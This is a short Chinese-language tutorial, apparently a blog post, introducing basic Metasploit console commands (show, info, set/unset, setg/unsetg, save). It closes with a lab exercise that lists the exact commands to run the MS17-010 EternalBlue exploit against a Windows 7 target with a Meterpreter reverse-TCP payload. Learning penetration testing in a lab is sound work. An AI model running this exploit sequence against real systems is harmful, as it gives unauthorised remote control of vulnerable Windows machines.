MSF：渗透之旅

渗透基础

1、show命令

Metasploit框架中包含数百个模块，没有人能用脑子把他们的名字全部记下来。在MSF终端中，运行show命令会把所有模块显示出来。

show exploits   //会显示MSF中所有可用的渗透攻击模块
show auxiliary  //会显示所有的辅助模块以及它们的用途
show options    //保证MSF框架中各个模块正确运行所需的各种设置
show payloads   //会显示与当前模块兼容的攻击载荷
show targets    //列出收到特定漏洞影响目标系统的类型

2、info命令

当觉得show和search命令所提供的信息过于简短，可以使用info命令加上模块的名字来显示此模块的详细信息、参数说明以及所有可用的目标操作系统：（如果已选择了某个模块，直接在该模块的提示符下输入info即可）

3、set和unset

• MSF模块中的所有参数只有两个状态：已设置（set）或未设置（unset）
• 使用set命令可以对某个参数进行设置（同时启用该参数）
• 使用unset命令可以禁用相关参数

4、setg和unsetg

• setg、unsetg命令能够对全局参数进行设置或清除
• 使用这组命令让你不必每次遇到某个参数都要重新设置，特别是那些经常用到又很少会变的参数，如LHOST​​​​​​​

5、save

• 在使用setg命令对全局参数进行设置后，可以使用save命令将当前的设置值保存下来，这样在下次启动MSF终端时还可使用这些设置值
• 在MSF中可以在任何时候输入save命令保存当前状态
• 在命令执行结果中包含设置值保存在磁盘上的位置（/root/.msf5/config），如果由于一些原因需要恢复到原始设置，可以将这个文件删除或移动到其他位置。

模拟渗透

靶机：win7 X64 SP1

测试机：KALI

search ms17-010
use windows/smb/ms17_010_eternalblue
show options
set RHOSTS 192.168.X.X
set PAYLOAD windows/x64/meterpreter/reverse_tcp
exploit